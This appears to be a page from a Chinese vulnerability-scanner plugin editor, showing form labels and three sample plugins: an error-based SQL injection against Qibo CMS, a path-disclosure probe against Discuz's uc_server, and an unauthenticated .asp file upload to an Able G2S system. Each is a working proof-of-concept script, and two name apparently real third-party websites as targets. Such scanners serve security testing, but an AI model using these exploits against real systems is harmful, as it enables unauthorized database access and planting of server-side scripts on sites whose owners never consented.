插件助手
作者:
名称:
参考:
服务:
目标:
Payload:
Flag:
漏洞级别
note
info
warning
hole
判断方式
字符串
正则
发送方式:
Post/Cookies
Raw
Post:
Cookies:
Raw:
RetCode:
运行
样例代码:
sql注入
路径泄漏
文件上传
#!/usr/bin/env python #-*- coding:utf-8 -*- #__SerType:Qibo Blogsystem SQL-Injection def assign(service, arg): if service == fingerprint.qibocms: return True, arg def audit(arg): payload = 'blog/index.php?file=listbbs&uid=1&id=1&TB_pre=qb_module%20where%201=1%20or%20updatexml(2,concat(0x7e,(md5(1))),0)%20%23' target = arg + payload code, head, body, final_url, log = hackhttp.http(target) if code == 200 and 'c4ca4238a0b923820dcc509a6f75849' in body: security_hole(target, log=log) if __name__ == '__main__': from dummy import * audit(assign(fingerprint.qibocms, 'http://www.example.com/')[1])
运行
#!/usr/bin/env python import re def assign(service, arg): if service == fingerprint.discuz: return True, arg def audit(arg): url = arg code, head, res, final_url, log = hackhttp.http(url + 'uc_server/control/admin/db.php') if code == 200: m = re.search('not found in <b>([^<]+)</b> on line <b>(\d+)</b>', res) if m: security_info(m.group(1)) if __name__ == '__main__': from dummy import * audit(assign(fingerprint.discuz, 'http://www.ytjt.com.cn/')[1]) audit(assign(fingerprint.discuz, 'http://www.lockbay.cn/')[1])
运行
#!/usr/bin/python #-*- encoding:utf-8 -*- #__author__ = '1c3z' #ref http://wooyun.org/bugs/wooyun-2010-099059 def assign(service, arg): if service == fingerprint.able_g2s: return True, arg def audit(arg): raw = """POST AdminSpace/PublicClass/AddVideoCourseWare.ashx?action=UploadImage HTTP/1.1 Host: kczx.sus.edu.cn Content-Length: 563 Origin: http://kczx.sus.edu.cn X-Requested-With: ShockwaveFlash/17.0.0.188 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/43.0.2357.130 Chrome/43.0.2357.130 Safari/537.36 Content-Type: multipart/form-data; boundary=----------cH2ae0ae0GI3Ef1cH2ei4cH2ae0gL6 Accept: */* Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: ASP.NET_SessionId=a50pid55regfww55fticke45; ASPSESSIONIDCSQCRDCB=OJIBGEKDDNFGACCBKDCCJKDH ------------cH2ae0ae0GI3Ef1cH2ei4cH2ae0gL6 Content-Disposition: form-data; name="Filename" asp.asp ------------cH2ae0ae0GI3Ef1cH2ei4cH2ae0gL6 Content-Disposition: form-data; name="folder" /G2S/AdminSpace/PublicClass/ ------------cH2ae0ae0GI3Ef1cH2ei4cH2ae0gL6 Content-Disposition: form-data; name="Filedata"; filename="asp.asp" Content-Type: application/octet-stream zddfggsfagsdfhdfjskjhsdfkfk ------------cH2ae0ae0GI3Ef1cH2ei4cH2ae0gL6 Content-Disposition: form-data; name="Upload" Submit Query ------------cH2ae0ae0GI3Ef1cH2ei4cH2ae0gL6--""" url = arg + 'G2S/AdminSpace/PublicClass/AddVideoCourseWare.ashx?action=UploadImage' code, head,res, final_url, log = hackhttp.http(url,raw=raw) if '.asp' not in res or '<' in res: return url = arg + 'download/' + res code, head,res, final_url, log2= hackhttp.http(url) if code == 200 and 'zddfggsfagsdfhdfjskjhsdfkfk' in res: security_hole(url, log=log) if __name__ == '__main__': from dummy import * audit(assign(fingerprint.able_g2s, 'http://www.example.com/')[1])
运行